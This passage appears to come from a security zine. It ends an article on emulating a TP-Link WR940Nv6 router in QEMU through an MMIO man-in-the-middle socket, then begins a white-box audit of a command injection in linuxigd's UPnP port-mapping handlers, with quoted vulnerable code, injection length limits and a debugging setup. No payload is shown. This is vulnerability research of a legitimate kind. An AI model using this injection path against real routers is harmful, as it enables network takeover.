        if (initrd_size == (target_ulong) -1) {
            error_report("could not load initial ram disk '%s'",
                         loaderparams.initrd_filename);
            exit(1);
        }
    }
    return entry;
}

static void main_cpu_reset(void *opaque)
{
    ResetData *s = (ResetData *)opaque;
    CPUMIPSState *env = &s->cpu->env;

    cpu_reset(CPU(s->cpu));
    env->active_tc.PC = s->vector;
}


static void connect_to_mmio_server(void){
    int status;
    struct sockaddr_in serv_addr = { 0 }; // zero the unused padding
    if ((client_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("\n Socket creation error \n");
        return;
    }
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(1337);

    if (inet_pton(AF_INET, "127.0.0.1", &serv_addr.sin_addr)
        <= 0) {
        puts(
            "\n[*] bruh...");
        return;
    }

    if ((status
         = connect(client_fd, (struct sockaddr*)&serv_addr,
                   sizeof(serv_addr))) < 0) {
        puts("\n[-] Connection to the MMIO MITM interface failed...");
        puts("[*] Is the MMIO MITM script even running?!?!");
        exit(-1); // We need the interface to be up
        return;
    }
}

static int read_mmio_mitm(int address){
    int valread, ret_val = 0;
    char buffer[128] = { 0 };
    snprintf(buffer, sizeof(buffer), "r0x%x", address);
    send(client_fd, buffer, strlen(buffer), 0);
    memset(buffer, 0, sizeof(buffer));
    valread = read(client_fd, buffer, sizeof(buffer) - 1);
    if (valread > 0){ // read() returns -1 on error and 0 on EOF
        ret_val =  strtol(buffer, NULL, 16);
    }
    return ret_val;
}

static int write_mmio_mitm(int address, int value){
    int valread, ret_val = 0;
    char buffer[128] = { 0 };
    snprintf(buffer, sizeof(buffer), "w0x%x 0x%x", address, value);
    send(client_fd, buffer, strlen(buffer), 0);
    memset(buffer, 0, sizeof(buffer));
    valread = read(client_fd, buffer, sizeof(buffer) - 1);
    if (valread > 0){ // read() returns -1 on error and 0 on EOF
        ret_val = atoi(buffer);
    }
    return ret_val;
}

// MMIO Callbacks for GPIO
static uint64_t gpio_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    int base_addr = 0x18040000;
    int ret_val = 0;
    ret_val = read_mmio_mitm(base_addr + addr);
    return ret_val;
}

static void gpio_mmio_write(void *opaque, hwaddr addr,
                               uint64_t val, unsigned size)
{
    int base_addr = 0x18040000;
    if (addr == 0x44){ // This is for UART Multiplexing, skip.
        return;
    }
    write_mmio_mitm(base_addr + addr, val);
    return;
}

static const MemoryRegionOps gpio_mmio_ops = {
    .read  = gpio_mmio_read,
    .write = gpio_mmio_write,
    .endianness = DEVICE_BIG_ENDIAN
};

// MMIO Callbacks for SPI
static uint64_t spi_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    struct SPI_IO *spi_io = opaque;
    switch (addr) {
    case 0x0: 
      return 1;
    case 0x8:
      break;
    case 0xC: // (SPI_READ_DATA_ADDR)
      spi_io->cmd = ((spi_io->cmd & 0x0F) << 4 | (spi_io->cmd & 0xF0) >> 4 
      | (spi_io->cmd & 0xF000) >> 4 | (spi_io->cmd & 0xF00) << 4  | 
      (spi_io->cmd & 0xF0000) << 4 | (spi_io->cmd & 0xF00000) >> 4 | 
      (spi_io->cmd & 0xF000000) << 4 | (spi_io->cmd & 0xF0000000) >> 4);
      if (spi_io->cmd == 0x9F){
        spi_io->cmd = 0;
        return 0x1337;
      }
      break;
    default:
      break;
    }

   return 0;
}

static void spi_mmio_write(void *opaque, hwaddr addr,
                               uint64_t val, unsigned size)
{
    struct SPI_IO *spi_io = opaque;
    switch (addr) {
    case 0x0: 
      break;
    case 0x8: // (SPI_IO_CONTROL_ADDR)
      if ((val == 0x70000) && (spi_io->cmd_in_progress == 0)){
        // CS0-2 are high which means disabled
        // reset cmd offset and cmd
        spi_io->cmd_offset = 0;
        spi_io->cmd = 0;
        spi_io->cmd_in_progress = 1;
      }
      else if ((val == 0x70000) && (spi_io->cmd_in_progress == 1)){
        spi_io->cmd_in_progress = 0;
        break;
      }
      if ((val & (1 << 8)) && (val & (1 << 18))){
        // CS2 is low (active)
        // SPI_Clock is high, so grab data value
        if (spi_io->cmd_offset == 32){
          break;
        }
        spi_io->cmd |= (val & 1) << spi_io->cmd_offset;
        spi_io->cmd_offset++;
      }
      break;
    default:
        break;
    }

    return;
}

static const MemoryRegionOps spi_mmio_ops = {
    .read  = spi_mmio_read,
    .write = spi_mmio_write,
    .endianness = DEVICE_BIG_ENDIAN
};


// MMIO Callbacks for DDR
static uint64_t ddr_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    int base_addr = 0x18000000;
    int ret_val = 0;
    ret_val = read_mmio_mitm(base_addr + addr);
    return ret_val;
}

static void ddr_mmio_write(void *opaque, hwaddr addr,
                               uint64_t val, unsigned size)
{
    int base_addr = 0x18000000;
    write_mmio_mitm(base_addr + addr, val);
    return;
}

static const MemoryRegionOps ddr_mmio_ops = {
    .read  = ddr_mmio_read,
    .write = ddr_mmio_write,
    .endianness = DEVICE_BIG_ENDIAN
};

struct fw_sections parse_wr940n_firmware_header(char *filename){
  struct fw_header fw_header;
  struct fw_sections fw_sections;
  FILE *fptr;
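  memset(&fw_header, 0, sizeof(fw_header));
  memset(&fw_sections, 0, sizeof(fw_sections));
  fptr = fopen(filename, "rb");
  if (fptr == NULL){
    // bootloader stays NULL so the caller can bail out
    printf("[-] Could not open fw image %s\n", filename);
    return fw_sections;
  }
  fseek(fptr, 0, SEEK_SET);
  size_t read = fread(&fw_header, 1, sizeof(fw_header), fptr);
  if (read != sizeof(fw_header)){
    printf("[-] Error while reading fw image %s\n", filename);
    printf("[-] Read size: %zu\n", read);
  }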
  // We need to swap since we're on AyyMD64
  fw_header.version = bswap_32(fw_header.version);
  fw_header.hw_id = bswap_32(fw_header.hw_id);
  fw_header.hw_rev = bswap_32(fw_header.hw_rev);
  fw_header.kernel_la = bswap_32(fw_header.kernel_la);
  fw_header.kernel_ep = bswap_32(fw_header.kernel_ep);
  fw_header.fw_length = bswap_32(fw_header.fw_length);
  fw_header.kernel_ofs = bswap_32(fw_header.kernel_ofs);
  fw_header.kernel_len = bswap_32(fw_header.kernel_len);
  fw_header.rootfs_ofs = bswap_32(fw_header.rootfs_ofs);
  fw_header.rootfs_len = bswap_32(fw_header.rootfs_len);
  fw_header.boot_ofs = bswap_32(fw_header.boot_ofs);
  fw_header.boot_len = bswap_32(fw_header.boot_len);
  fw_header.ver_hi = bswap_16(fw_header.ver_hi);
  fw_header.ver_mid = bswap_16(fw_header.ver_mid);
  fw_header.ver_lo = bswap_16(fw_header.ver_lo);
  printf("[*] Vendor: %s\n", fw_header.vendor_name);
  printf("[*] FW Version: %s\n", fw_header.fw_version);
  printf("[*] fw_header.kernel_la: 0x%08x\n", fw_header.kernel_la);
  printf("[*] fw_header.kernel_ep: 0x%08x\n", fw_header.kernel_ep);
  printf("[*] fw_header.kernel_ofs: 0x%08x\n", fw_header.kernel_ofs);
  printf("[*] fw_header.kernel_len: 0x%08x\n", fw_header.kernel_len);
  printf("[*] fw_header.rootfs_ofs: 0x%08x\n", fw_header.rootfs_ofs);
  printf("[*] fw_header.rootfs_len: 0x%08x\n", fw_header.rootfs_len);
  printf("[*] fw_header.bootlen: 0x%08x\n", fw_header.boot_len);
  printf("[*] fw_header.boot_ofs: 0x%08x\n", fw_header.boot_ofs);
  printf("[*] fw_header.fw_length: 0x%08x\n", fw_header.fw_length);
  fw_sections.boot_loader_len = fw_header.fw_length - 0x200;
  fw_sections.bootloader = g_malloc(fw_sections.boot_loader_len + 1);
  read = fread(fw_sections.bootloader, 1, fw_sections.boot_loader_len, 
               fptr);
  if (read != fw_sections.boot_loader_len){
    printf("[-] Error while reading from file: %s\n", filename);
  }
  fclose(fptr);
  return fw_sections;
}

static void
mips_wr940n_init(MachineState *machine)
{
    const char *kernel_filename = machine->kernel_filename;
    const char *kernel_cmdline = machine->kernel_cmdline;
    const char *initrd_filename = machine->initrd_filename;
    char *filename;
    MemoryRegion *address_space_mem = get_system_memory();
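    MemoryRegion *bios = g_new(MemoryRegion, 1);
    MemoryRegion *isa = g_new(MemoryRegion, 1);
    MemoryRegion *gpio_mmio = g_new(MemoryRegion, 1);
    MemoryRegion *spi_mmio = g_new(MemoryRegion, 1);
    MemoryRegion *ddr_mmio = g_new(MemoryRegion, 1);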
    Clock *cpuclk;
    MIPSCPU *cpu;
    CPUMIPSState *env;
    ResetData *reset_info;
    struct fw_sections fw_sections;
    memset(&fw_sections, 0, sizeof(fw_sections));

    // Connect to MMIO Server
    connect_to_mmio_server();

    cpuclk = clock_new(OBJECT(machine), "cpu-refclk");
    clock_set_hz(cpuclk, 200 * 1000000); /* 200 MHz */

    /* Init CPUs. */
    cpu = mips_cpu_create_with_clock(machine->cpu_type, cpuclk);
    env = &cpu->env;

    reset_info = g_new0(ResetData, 1);
    reset_info->cpu = cpu;
    reset_info->vector = 0x9F000400;
    qemu_register_reset(main_cpu_reset, reset_info);

    /* Allocate RAM. */
    memory_region_add_subregion(address_space_mem, 0, machine->ram);

    /* bootloader */
    filename = qemu_find_file(QEMU_FILE_TYPE_BIOS, machine->firmware ?: 
                              BIOS_FILENAME);
    if (filename) {
        fw_sections = parse_wr940n_firmware_header(filename);
        /* Map the BIOS / boot exception handler. */
        memory_region_init_rom(bios, NULL, "WR940NV6.bios.rom", 
                               fw_sections.boot_loader_len, &error_fatal);
        memory_region_add_subregion_overlap(address_space_mem, 0x1F000000, 
                                            bios, 0);
        rom_add_blob_fixed(filename, fw_sections.bootloader, 
                           fw_sections.boot_loader_len, 0x1F000000);
        g_free(filename);
    }
    if (fw_sections.bootloader == 0) {
        /* we don't have a kernel image nor boot vector code.*/
        error_report("Could not load TP-Link FW Image bios '%s'", 
                      machine->firmware);
        exit(1);
    } else {
        /* We have a boot vector start address. */
        env->active_tc.PC = (target_long)(int32_t)0x9F000400;
    }

    /* GPIO */
    memory_region_init_io(gpio_mmio, NULL, &gpio_mmio_ops, NULL, 
                          "GPIO_MMIO", 0x74);
    memory_region_add_subregion(address_space_mem, 0x18040000LL,
                                gpio_mmio);

    /* SPI */ 
    struct SPI_IO *spi_io = g_malloc0(sizeof(struct SPI_IO));
    spi_io->spi_contents = g_malloc0(fw_sections.boot_loader_len+1);
    memcpy(spi_io->spi_contents, fw_sections.bootloader, 
           fw_sections.boot_loader_len);
    memory_region_init_io(spi_mmio, NULL, &spi_mmio_ops, spi_io, 
                          "SPI_MMIO", 0x20);
    memory_region_add_subregion_overlap(address_space_mem, 0x1F000000LL, 
                                        spi_mmio, 1);

    /* DDR */
    memory_region_init_io(ddr_mmio, NULL, &ddr_mmio_ops, NULL, 
                          "DDR_MMIO", 0x160);
    memory_region_add_subregion(address_space_mem, 0x18000000LL, 
                                ddr_mmio);

    if (kernel_filename) {
        loaderparams.ram_size = machine->ram_size;
        loaderparams.kernel_filename = kernel_filename;
        loaderparams.kernel_cmdline = kernel_cmdline;
        loaderparams.initrd_filename = initrd_filename;
        reset_info->vector = load_kernel();
    }

    /* Init CPU internal devices. */
    cpu_mips_irq_init_cpu(cpu);
    cpu_mips_clock_init(cpu);

    memory_region_init_alias(isa, NULL, "isa_mmio",
                             get_system_io(), 0, 0x00010000);
    memory_region_add_subregion(get_system_memory(), 0x1fd00000, 
                                isa);
}

static void mips_wr940n_machine_init(MachineClass *mc)
{
    mc->desc = "TP-Link WR940NV6 Board by b1ack0wl";
    mc->init = mips_wr940n_init;
    mc->default_cpu_type = MIPS_CPU_TYPE_NAME("74Kf");
    mc->default_ram_size = 1 * GiB; // for debug reasons
    mc->default_ram_id = "mips_wr940n.ram";
}

DEFINE_MACHINE("WR940NV6", mips_wr940n_machine_init)


Header File (wr940n.h)
* This needs to be put in the `qemu/include/hw/mips/` folder

#include <byteswap.h>
#include "hw/sysbus.h"
#include "chardev/char-fe.h"
struct fw_sections parse_wr940n_firmware_header(char *filename);

struct fw_sections{
  char *bootloader;
  int boot_loader_len;
  char *kernel;
  int kernel_len;
  char *rootfs;
  int root_fs_len;
};

/* 
lifted from 
https://github.com/jtreml/firmware-mod-kit/blob/master/src
/firmware-tools/mktplinkfw.c
*/
struct fw_header {
  uint32_t  version;  /* header version */
  char    vendor_name[24];
  char    fw_version[36];
  uint32_t  hw_id;    /* hardware id */
  uint32_t  hw_rev;   /* hardware revision */
  uint32_t  unk1;
  uint8_t   md5sum1[16];
  uint32_t  unk2;
  uint8_t   md5sum2[16];
  uint32_t  unk3;
  uint32_t  kernel_la;  /* kernel load address */
  uint32_t  kernel_ep;  /* kernel entry point */
  uint32_t  fw_length;  /* total length of the firmware */
  uint32_t  kernel_ofs; /* kernel data offset */
  uint32_t  kernel_len; /* kernel data length */
  uint32_t  rootfs_ofs; /* rootfs data offset */
  uint32_t  rootfs_len; /* rootfs data length */
  uint32_t  boot_ofs; /* bootloader data offset */
  uint32_t  boot_len; /* bootloader data length */
  uint16_t  ver_hi;
  uint16_t  ver_mid;
  uint16_t  ver_lo;
  uint8_t   pad[354];
};

struct SPI_IO {
    /*< private >*/
    SysBusDevice parent_obj;
    /*< public >*/

    MemoryRegion regs_region;
    CharBackend chr;

    char *spi_contents;
    char model_number[5];
    uint32_t read_offset;
    uint32_t read_len;
    uint8_t  busy_flag;
    uint32_t cmd;
    uint8_t cmd_offset;
    uint8_t cmd_in_progress;
};
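
The header fields are stored big-endian, which is why the board code
byte-swaps them on a little-endian host. As a minimal sketch (not part of
the board code), the same fields can also be decoded byte by byte, which
works regardless of host endianness. The helper names be32_at() and
fw_payload_len() are hypothetical, and the offsets assume that struct
fw_header is laid out without padding, as its field order suggests:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Byte offsets derived from the field order of struct fw_header
 * (assumption: no compiler-inserted padding). */
enum {
    FW_OFF_KERNEL_LA = 116,
    FW_OFF_KERNEL_EP = 120,
    FW_OFF_FW_LENGTH = 124,
    FW_HEADER_SIZE   = 0x200
};

/* Hypothetical helper: read a big-endian 32-bit value at buf[off]. */
static uint32_t be32_at(const uint8_t *buf, size_t off)
{
    assert(buf != NULL);
    return ((uint32_t)buf[off] << 24) |
           ((uint32_t)buf[off + 1] << 16) |
           ((uint32_t)buf[off + 2] << 8) |
            (uint32_t)buf[off + 3];
}

/* Hypothetical helper: number of bytes following the 0x200-byte header,
 * mirroring the fw_length - 0x200 computation of the board code. */
static uint32_t fw_payload_len(const uint8_t *hdr)
{
    return be32_at(hdr, FW_OFF_FW_LENGTH) - FW_HEADER_SIZE;
}
```

With this layout the fields add up to exactly 0x200 bytes, which matches
the `fw_length - 0x200` computation in parse_wr940n_firmware_header().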


Add this board to QEMU by modifying `qemu/hw/mips/meson.build` and
adding the following statement:
`mips_ss.add(when: 'CONFIG_WR940N', if_true: files('0wl_wr940n_v6.c'))`

Then, go into `qemu/hw/mips/Kconfig` and add the following statements:

config WR940N
    bool
    select SERIAL
    select MIPSNET


NOTE: The peripherals above are copied from MIPSSIM, but other included
peripherals can be added if they can be utilized (e.g. XILINX UART).

To run this board, run the following command after building, replacing
WR940NV6_FW_FILE with the firmware image
(e.g. wr940nv6_us_3_20_1_up_boot(220801).bin):
`./qemu-system-mips -s -machine WR940NV6 -bios WR940NV6_FW_FILE`

The board automatically extracts the contents of the WR940Nv6 firmware
blob, maps the bootloader and kernel, and begins execution at Das U-Boot.
You'll see the LED blink a few colors on the physical device, and then the
virtual board should crash because an MMIO region has not been allocated.
It is up to the reader to implement the rest of the MMIO peripherals,
using the MITM technique either to narrow in on a specific device
(e.g. WiFi) or simply to see what's going on during the boot process or
when a driver interacts with the hardware.
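
The QEMU side of the MITM channel speaks a tiny text protocol:
read_mmio_mitm() sends "r0x<addr>" and parses the reply as hexadecimal,
while write_mmio_mitm() sends "w0x<addr> 0x<value>" and parses the reply
with atoi(). As a rough sketch of what the other end of the socket has to
decode, the requests could be parsed as follows. The enum, struct, and
function names are hypothetical, and message framing over TCP is ignored:

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

enum mitm_op { MITM_INVALID, MITM_READ, MITM_WRITE };

struct mitm_req {
    enum mitm_op op;
    uint32_t addr;
    uint32_t value; /* only meaningful for MITM_WRITE */
};

/* Hypothetical helper: decode one request as formatted by
 * read_mmio_mitm() ("r0x%x") or write_mmio_mitm() ("w0x%x 0x%x"). */
static struct mitm_req mitm_parse(const char *msg)
{
    struct mitm_req req = { MITM_INVALID, 0, 0 };
    unsigned int addr = 0, value = 0;

    assert(msg != NULL);
    if (sscanf(msg, "w0x%x 0x%x", &addr, &value) == 2) {
        req.op = MITM_WRITE;
        req.addr = addr;
        req.value = value;
    } else if (sscanf(msg, "r0x%x", &addr) == 1) {
        req.op = MITM_READ;
        req.addr = addr;
    }
    return req;
}

/* Hypothetical helper: format the reply to a read request. The QEMU side
 * parses it with strtol(buffer, NULL, 16), so hexadecimal is expected. */
static int mitm_format_read_reply(char *out, size_t len, uint32_t value)
{
    return snprintf(out, len, "0x%x", (unsigned int)value);
}
```

A write request only needs a decimal status string in return, since the
board code converts that reply with atoi().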

Happy Hacking :)

--[ References

/!\ AUTHOR_NOTE: If the above link 404s, go to the GPL code center
and look for WR940Nv6: https://www.tp-link.com/us/support/Sgpl-code/



|=-----------------------------------------------------------------------=|
|=--------------=[ 7 - Shell Your Way to Network Mastery ]=--------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ Gabriel & Thomas ]=-------------------------=|
|=-----------------------------------------------------------------------=|

1 - Abstract
2 - Introduction
3 - White-box audit
4 - Compilation and debugging
5 - Becoming a Bash Jiu Jitsu white belt
6 - Becoming a Bash Jiu Jitsu purple belt
7 - Becoming a Bash Jiu Jitsu black belt
8 - Claiming supremacy over the mats
9 - Conclusion
10 - Acknowledgments
11 - References

---------------------------------------------------------------------------
--[ 1. Abstract

Control over a LAN can be achieved by exploiting an old network service
that is reachable through HTTP requests. By targeting a vulnerability in
the way the service parses request parameters, a patient attacker can
force the execution of unauthorized commands, as if typed on a command
line. This flaw makes it possible to bypass the built-in rulesets that
would otherwise block such exploits and to gain deeper access. By
carefully crafting unexpected HTTP requests while manipulating specific
SOAP payloads, we can reach what we desire the most: the takeover of the
network.

---------------------------------------------------------------------------
--[ 2. Introduction

Universal Plug and Play (UPnP) has long been a subject of concern due to
its widespread use in simplifying network configurations, often at the
expense of security. Originally designed to allow devices to automatically
discover and configure themselves on a network, UPnP relies on the Internet
Gateway Device (IGD), typically a router, to manage inbound and outbound
traffic. However, the very features that make it convenient, such as
automatic port forwarding and NAT traversal, also open the door to
exploitation.

Over time, Linux IGD implementations, which allow Linux-based systems to
perform similar functions, have become increasingly relevant in the threat
landscape. Despite being an old service, UPnP and its related components
still present a range of vulnerabilities that attackers can exploit. 
The next section will explore how a modified version of linuxigd 
(linux-igd)[1] can be exploited. 

---------------------------------------------------------------------------
--[ 3. White-box audit

The focus of this analysis is on the implementation of linuxigd (linux-igd) 
and its derivatives, such as the reuse of its codebase within SDKs. The 
original code can be found on SourceForge[2]. The service was written in 
C++ at first, but the developers switched to C starting with version 0.95.

                    +----------------------+----------+
                    |       Version        | Language |
                    +----------------------+----------+
                    | gateway-0.71.tgz     | C++      |
                    | gateway-0.75.tgz     | C++      |
                    | gateway-0.90.tgz     | C++      |
                    | gateway-0.91.tgz     | C++      |
                    | linuxigd-0.92.tgz    | C++      |
                    | linuxigd-0.95.tar.gz | C        |
                    | linuxigd-1.0.tar.gz  | C        |
                    +----------------------+----------+

While each version and its changes have been analyzed, the vendor seems to
have based its SDK on a modified version 1.0. The code examples below are
taken from the vendor's modified source code of linuxigd 1.0, the latest
version. Identifying other SDKs and firmware images that reuse this
codebase is left to the reader as a firmware analysis exercise.

Reading the source code of pmlist.c reveals several command injections in
the pmlist_AddPortMapping() and pmlist_DeletePortMapping() functions.

int pmlist_AddPortMapping(int enabled, char *protocol, char *externalPort,
                          char *internalClient, char *internalPort)
{
    if (enabled)
    {
        ...

        char command[COMMAND_LEN];
        int status;

        {
            ...

            snprintf(command, COMMAND_LEN, "%s -t nat -I %s -i %s -p %s"
                     " --dport %s -j DNAT --to %s:%s", g_vars.iptables,
                     g_vars.preroutingChainName, g_vars.extInterfaceName,
                     protocol, externalPort, internalClient, internalPort);
            trace(3, "%s", command);
            system(command);
            ...
        }

        if (g_vars.forwardRules)
        {
            snprintf(command, COMMAND_LEN, "%s -A %s -p %s"
                     " -d %s --dport %s -j ACCEPT", g_vars.iptables,
                     g_vars.forwardChainName, protocol, internalClient,
                     internalPort);
            trace(3, "%s", command);
            system(command);
            ...
        }
        ...
    }
    return 1;
}

int pmlist_DeletePortMapping(int enabled, char *protocol,
                             char *externalPort, char *internalClient,
                             char *internalPort)
{
    if (enabled)
    {
        ...

        char command[COMMAND_LEN];
        int status;

        {
            ...

            snprintf(command, COMMAND_LEN, "%s -t nat -D %s -i %s -p %s"
                     " --dport %s -j DNAT --to %s:%s", g_vars.iptables,
                     g_vars.preroutingChainName, g_vars.extInterfaceName,
                     protocol, externalPort, internalClient, internalPort);
            trace(3, "%s", command);
            system(command);
            ...
        }

        if (g_vars.forwardRules)
        {
            snprintf(command, COMMAND_LEN, "%s -D %s -p %s"
                     " -d %s --dport %s -j ACCEPT", g_vars.iptables,
                     g_vars.forwardChainName, protocol, internalClient,
                     internalPort);
            trace(3, "%s", command);
            system(command);
            ...
        }
        ...
    }
    return 1;
}


Both functions build the command string from values controlled by the
attacker and pass it to system() unmodified, which allows shell
metacharacters to be interpreted. The pmlist_AddPortMapping() function is
called by the pmlist_PushBack() function within the pmlist.c file.

int pmlist_PushBack(struct portMap* item)
{
    int action_succeeded = 0;

    ...

    if (action_succeeded == 1)
    {
        pmlist_AddPortMapping(item->m_PortMappingEnabled,
                              item->m_PortMappingProtocol,
                              item->m_ExternalPort, item->m_InternalClient,
                              item->m_InternalPort);
        return 1;
    }
    else
        return 0;
}


The code above shows that the values supplied to the
pmlist_AddPortMapping() function are not sanitized at this point. Any
validation has to happen earlier in the call stack, when the portMap
structure is created and before it is supplied to the pmlist_PushBack()
function. This can be observed in the gatedevice.c file, where the
AddPortMapping() function is defined. This function is called by the SOAP
action handler HandleActionRequest(), which EventHandler() calls to
process the associated HTTP request.

int AddPortMapping(struct Upnp_Action_Request *ca_event)
{
    char *remote_host = NULL;
    char *ext_port = NULL;
    char *proto = NULL;
    char *int_port = NULL;
    char *int_ip = NULL;
    char *int_duration = NULL;
    char *bool_enabled = NULL;
    char *desc = NULL;
    struct portMap *ret, *new;
    int result;
    char num[5]; // Maximum number of port mapping entries 9999
    IXML_Document *propSet = NULL;
    int action_succeeded = 0;
    char resultStr[RESULT_LEN];

    if (
        (ext_port = GetFirstDocumentItem(ca_event->ActionRequest,
                                         "NewExternalPort")) &&
        (proto = GetFirstDocumentItem(ca_event->ActionRequest,
                                      "NewProtocol")) &&
        (int_port = GetFirstDocumentItem(ca_event->ActionRequest,
                                         "NewInternalPort")) &&
        (int_ip = GetFirstDocumentItem(ca_event->ActionRequest,
                                       "NewInternalClient")) &&
        (int_duration = GetFirstDocumentItem(ca_event->ActionRequest,
                                             "NewLeaseDuration")) &&
        (bool_enabled = GetFirstDocumentItem(ca_event->ActionRequest,
                                             "NewEnabled")) &&
        (desc = GetFirstDocumentItem(ca_event->ActionRequest,
                                     "NewPortMappingDescription")))
    {
        remote_host = GetFirstDocumentItem(ca_event->ActionRequest,
                                           "NewRemoteHost");

        ...
        if ((ret = pmlist_Find(ext_port, proto, int_ip)) != NULL)
        {
            trace(3, "Found port map to already exist.  Replacing");
            pmlist_Delete(ret);
        }

        new = pmlist_NewNode(atoi(bool_enabled), atol(int_duration), "",
                             ext_port, int_port, proto, int_ip, desc);
        result = pmlist_PushBack(new);
        ...
    }
    ...
}


The pmlist_NewNode() function, defined in the pmlist.c file, only checks
that each value contained in the SOAP request fits into its destination
field; the content itself is not validated. To clarify the information
presented so far, the diagram below summarizes the call stack.

        +------------------+
        |      main()      |
        +------------------+
                 |
                 v
     +------------------------+
     |     EventHandler()     |
     +------------------------+
                 |
                 v
   +---------------------------+
   |   HandleActionRequest()   |
   +---------------------------+
                 |
                 v
    +--------------------------+
    |     AddPortMapping()     |
    +--------------------------+
              /            \
             v              v
    +------------------+   +---------------------+
    | pmlist_NewNode() |   |  pmlist_PushBack()  |<---+
    +------------------+   +---------------------+    |
             |                        |               |
             |                        |               |
             +----struct portMap------|---------------+
                                      |
                                      v
                         +-------------------------+
                         | pmlist_AddPortMapping() |
                         +-------------------------+
                                     |
                                     v
                              +------------+
                              |  system()  |
                              +------------+

struct portMap* pmlist_NewNode(int enabled, long int duration,
                               char *remoteHost, char *externalPort,
                               char *internalPort, char *protocol,
                               char *internalClient, char *desc)
{
    struct portMap* temp = (struct portMap*) malloc(
                                                    sizeof(struct portMap)
                                                   );

    temp->m_PortMappingEnabled = enabled;

    if (remoteHost && strlen(remoteHost) < sizeof(temp->m_RemoteHost))
        strcpy(temp->m_RemoteHost, remoteHost);
    else
        strcpy(temp->m_RemoteHost, "");

    if (strlen(externalPort) < sizeof(temp->m_ExternalPort))
        strcpy(temp->m_ExternalPort, externalPort);
    else
        strcpy(temp->m_ExternalPort, "");

    if (strlen(internalPort) < sizeof(temp->m_InternalPort))
        strcpy(temp->m_InternalPort, internalPort);
    else
        strcpy(temp->m_InternalPort, "");

    if (strlen(protocol) < sizeof(temp->m_PortMappingProtocol))
        strcpy(temp->m_PortMappingProtocol, protocol);
    else
        strcpy(temp->m_PortMappingProtocol, "");

    if (strlen(internalClient) < sizeof(temp->m_InternalClient))
        strcpy(temp->m_InternalClient, internalClient);
    else
        strcpy(temp->m_InternalClient, "");

    if (strlen(desc) < sizeof(temp->m_PortMappingDescription))
        strcpy(temp->m_PortMappingDescription, desc);
    else
        strcpy(temp->m_PortMappingDescription, "");

    temp->m_PortMappingLeaseDuration = duration;
    temp->next = NULL;
    temp->prev = NULL;

    return temp;
}


To identify the length of each structure field, it is sufficient to read
its definition in the pmlist.h file.

struct portMap
{
  int m_PortMappingEnabled;
  long int m_PortMappingLeaseDuration;
  char m_RemoteHost[16];
  char m_ExternalPort[6];
  char m_InternalPort[6];
  char m_PortMappingProtocol[4];
  char m_InternalClient[16];
  char m_PortMappingDescription[50];

  int expirationEventId;
  long int expirationTime;

  struct portMap* next;
  struct portMap* prev;
} *pmlist_Head, *pmlist_Tail, *pmlist_Current;


The definition of the above structure shows that the attacker is limited
in the number of characters that can be injected into each field of the
SOAP request: because pmlist_NewNode() requires strlen() to be strictly
smaller than the field size, at most 3 characters fit in the protocol, 5
in each port, and 15 in the internal client. This restricts the commands
that can be used to exploit the command injection.
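
The length budget can be checked with a short sketch. fits_field()
reproduces the strlen() < sizeof() test of pmlist_NewNode(), and
format_dnat_rule() reuses the first format string of
pmlist_AddPortMapping() but only returns the string instead of calling
system(). Both helper names are hypothetical; the iptables path, chain,
and interface are placeholders taken from the service log shown in
section 4 and stand in for the g_vars values:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Field sizes copied from struct portMap in pmlist.h. */
#define PROTOCOL_SIZE    4
#define EXT_PORT_SIZE    6
#define INT_PORT_SIZE    6
#define INT_CLIENT_SIZE 16

/* Mirrors the only test applied by pmlist_NewNode():
 * strlen(value) < sizeof(field). */
static int fits_field(const char *value, size_t field_size)
{
    assert(value != NULL);
    return strlen(value) < field_size;
}

/* Hypothetical helper: builds the DNAT rule with the same format string
 * as pmlist_AddPortMapping(), but only returns the string. The first
 * three arguments are placeholders for g_vars.iptables,
 * g_vars.preroutingChainName and g_vars.extInterfaceName. */
static int format_dnat_rule(char *out, size_t len, const char *protocol,
                            const char *ext_port, const char *int_client,
                            const char *int_port)
{
    return snprintf(out, len, "%s -t nat -I %s -i %s -p %s"
                    " --dport %s -j DNAT --to %s:%s", "/sbin/iptables",
                    "PREROUTING", "dummy0", protocol, ext_port,
                    int_client, int_port);
}
```

A five-character port such as "BBBBB" passes the check while "BBBBBB"
does not, and whatever passes is copied verbatim into the command string,
metacharacters included.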

---------------------------------------------------------------------------
--[ 4. Compilation and debugging

To study the service's behavior during execution, it is highly recommended
to compile it from source and debug it to streamline the development phase
of the exploit. The compilation phase was likely the most troublesome. As
the service's source code was quite outdated, it took numerous tests and
failures before a solution was found. The solution was to compile and run
the service in a virtual machine (x86_64) using QEMU, with Fedora 21
selected as the guest operating system.

It is not necessary to allocate much storage space, as this machine will
only run the sshd service (for administration) and the targeted service.
A disk can be created with the following command.

$ qemu-img create -f qcow2 fedora21.qcow2 20G

Once the disk is created, the next step is to launch QEMU, specifying the
path to the ISO (the download link is provided in the references
section[3]), and perform a standard Fedora 21 installation.

$ qemu-system-x86_64 \
    -m 4G \
    -smp 4 \
    -cdrom Fedora-Live-Workstation-x86_64-21-5.iso \
    -drive file=fedora21.qcow2,format=qcow2 \
    -boot d \
    -net nic \
    -net user \
    -vga std \
    -display default

Once the operating system is installed on the guest machine, the VM can be
powered off and then restarted using the command below.

$ qemu-system-x86_64 \
    -m 4G \
    -smp 4 \
    -drive file=fedora21.qcow2,format=qcow2 \
    -net nic \
    -net user,hostfwd=tcp::2222-:22 \
    -vga std \
    -display default

The libupnp[4] library must be compiled and installed before linux-igd,
which relies on it to implement the UPnP Internet Gateway Device (IGD)
protocol. Since linux-igd links against libupnp, building it first avoids
errors caused by missing headers and libraries. According to the linux-igd
installation file INSTALL, we must first compile version 1.3.1[5] of the
libupnp library.

$ tar -xf libupnp-1.3.1.tar.gz
$ cd libupnp-1.3.1/
$ ./configure
$ make -j4
$ sudo make install

The targeted service can then be compiled.

$ tar -xf linuxigd-1.0.tar.gz
$ cd linuxigd-1.0/
$ make -j4
$ sudo make install

Following the installation of linux-igd, the following files have been
added to the system.

/etc/
|__ linuxigd/
|   |__ dummy.xml
|   |__ gateconnSCPD.xml
|   |__ gatedesc.xml
|   |__ gateicfgSCPD.xml
|__ upnpd.conf

